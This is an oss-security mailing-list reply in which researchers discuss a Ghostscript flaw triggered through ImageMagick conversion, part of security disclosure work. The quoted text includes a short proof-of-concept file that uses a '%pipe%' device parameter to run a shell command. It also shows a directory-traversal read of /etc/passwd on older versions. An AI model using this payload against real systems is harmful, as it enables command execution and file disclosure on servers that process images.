Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 30 Sep 2016 15:58:25 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
> * Tavis Ormandy:
>>
>> $ cat test.gif
>> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
>> .putdeviceparams
>> quit
>> $ convert test.gif png:test.png
>>
>> (Note: I don't know why it doesn't work on earlier versions, maybe
>> it's possible to make it work, or some other param will work)
>
> It still tries to open a file in earlier versions, with directory
> traversal:
>
> [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
>
> The %pipe%-based execution was introduced as a side effect of:
>

Thanks Florian! I took a look where that directory comes from, I think
it pulls it from a userparam, like:

<< (ICCProfilesDir) (whatever) >> .setuserparams

That probably needs to be fixed. I wonder if there's a way to get that
directory to populate back into the PermitFileReading array?

Tavis.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ